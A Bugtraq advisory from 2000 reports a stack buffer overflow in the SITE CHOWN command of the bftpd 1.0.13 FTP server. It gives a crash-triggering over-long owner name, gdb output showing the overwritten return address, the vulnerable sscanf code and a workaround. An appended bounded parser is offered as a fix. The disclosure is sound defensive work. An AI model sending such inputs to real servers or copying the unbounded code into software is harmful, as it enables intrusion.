Date: Wed, 13 Dec 2000 20:13:25 +0100
From: BAILLEUX Christophe <cb@GROLIER.FR>
Subject: Potential Buffer Overflow vulnerability in bftpd-1.0.13
To: BUGTRAQ@SECURITYFOCUS.COM

There is a potential buffer overflow vulnerability in the "SITE CHOWN" command
of bftpd 1.0.13: the owner name is read with sscanf() into a fixed-size stack
buffer with no field width, so an over-long name overruns the buffer. A
sufficiently long name crashes the server after it has already answered:

    230 User logged in.
    site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A
    550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found.
    Connection closed by foreign host.

Attaching gdb to the server process shows the saved return address overwritten
with 0x41 bytes ('A'):

    gdb /usr/sbin/bftpd 18214
    .............
    Loaded symbols for /lib/libnss_compat.so.2
    Reading symbols from /lib/libnsl.so.1...done.
    Loaded symbols for /lib/libnsl.so.1
    0x400e7514 in read () from /lib/libc.so.6
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) x $esp
    0xbffffc68:     0x41414141
    (gdb)

The problem is in the command_chown function in commands.c (lines 465-483 of
the 1.0.13 source). The excerpt below is the vulnerable code as shipped; the
comments mark the unbounded conversions:

    void command_chown(char *params) {
        /* Fixed-size stack buffers: USERLEN + 1 bytes per name, 256 for the file name. */
        char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1], filename[256];
        int uid, gid;
        if(!strstr(params, " ")) {
            fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>] <filename>\r\n");
            return;
        }
        /* No field widths: "%[^ ]" copies everything up to the first space into foo
           regardless of USERLEN, and "%s" does the same for filename. */
        sscanf(params, "%[^ ] %s", foo, filename);
        if(strstr(foo, "."))
            /* Same problem here: owner and group are filled without any bound. */
            sscanf(foo, "%[^.].%s", owner, group);
        else {
            strcpy(owner, foo);
            group[0] = '\0';
        }
        if(!sscanf(owner, "%i", &uid)) /* Is it a number? */
            if(((uid = mygetpwnam(owner, passwdfile))) < 0) {
                fprintf(stderr, "550 User '%s' not found.\r\n", owner);
                return;
            }

Workaround: until a fixed version is available, disable SITE commands by
replacing ENABLE_SITE=yes with ENABLE_SITE=no in /etc/bftpd.conf.

Best regards,

--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr
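For comparison, here is a bounded parser for the same "<owner>[.<group>] <filename>" argument format. This is an added example written for this page, not bftpd's own code nor part of the advisory. It assumes USERLEN is 32 (bftpd defines its real value in its own headers), and the names parse_chown_params, chown_parse_matches and struct chown_args are hypothetical. Over-long names are rejected outright rather than truncated with a scanf field width, because truncating "AAAA...A" to USERLEN bytes would silently look up a different user name.

```c
#include <stdio.h>
#include <string.h>

#define USERLEN 32        /* assumed value for this example; bftpd defines its own */
#define FILENAMELEN 256   /* matches the filename[256] buffer in command_chown */

struct chown_args {
    char owner[USERLEN + 1];
    char group[USERLEN + 1];
    char filename[FILENAMELEN];
};

/* Bounded replacement for the two unbounded sscanf() calls in command_chown.
 * Returns 0 and fills *out on success, -1 on malformed or over-long input. */
int parse_chown_params(const char *params, struct chown_args *out)
{
    char spec[2 * USERLEN + 2];                 /* "<owner>.<group>" plus NUL */
    const char *space = strchr(params, ' ');
    if (space == NULL)                          /* the original "550 Usage" case */
        return -1;

    size_t spec_len = (size_t)(space - params);
    if (spec_len == 0 || spec_len >= sizeof spec)
        return -1;
    memcpy(spec, params, spec_len);
    spec[spec_len] = '\0';

    /* File name: skip the separating spaces, then take the next token. */
    const char *fname = space;
    while (*fname == ' ')
        fname++;
    size_t fn_len = strcspn(fname, " \t\r\n");
    if (fn_len == 0 || fn_len >= FILENAMELEN)
        return -1;
    memcpy(out->filename, fname, fn_len);
    out->filename[fn_len] = '\0';

    /* Split "<owner>[.<group>]" with an explicit length check on each part. */
    const char *dot = strchr(spec, '.');
    if (dot != NULL) {
        size_t olen = (size_t)(dot - spec);
        size_t glen = strlen(dot + 1);
        if (olen == 0 || olen > USERLEN || glen > USERLEN)
            return -1;
        memcpy(out->owner, spec, olen);
        out->owner[olen] = '\0';
        memcpy(out->group, dot + 1, glen + 1);  /* includes the terminating NUL */
    } else {
        if (strlen(spec) > USERLEN)
            return -1;
        strcpy(out->owner, spec);
        out->group[0] = '\0';
    }
    return 0;
}

/* Parses params and reports whether the result matches the expected fields;
 * returns 1 on a full match, 0 if parsing fails or any field differs. */
int chown_parse_matches(const char *params, const char *owner,
                        const char *group, const char *filename)
{
    struct chown_args a;
    if (parse_chown_params(params, &a) != 0)
        return 0;
    return strcmp(a.owner, owner) == 0 && strcmp(a.group, group) == 0 &&
           strcmp(a.filename, filename) == 0;
}

int main(void)
{
    /* Constructed inputs: two benign commands and an over-long owner name of
     * the kind shown in the advisory (40 'A's, well past USERLEN). */
    char long_owner[64];
    memset(long_owner, 'A', 40);
    strcpy(long_owner + 40, ".AAAAAAAAAA A");
    const char *inputs[] = { "ftp.users upload.txt", "root report.txt", long_owner };
    for (size_t i = 0; i < 3; i++) {
        struct chown_args a;
        if (parse_chown_params(inputs[i], &a) == 0)
            printf("ok: owner='%s' group='%s' file='%s'\n", a.owner, a.group, a.filename);
        else
            printf("rejected: %.20s...\n", inputs[i]);
    }
    return 0;
}
```

The caller would send the original "550 Usage" reply on -1 and never reach the user lookup with unchecked data; every copy into a fixed buffer is preceded by a comparison against that buffer's size, which is the property the original sscanf() calls lack.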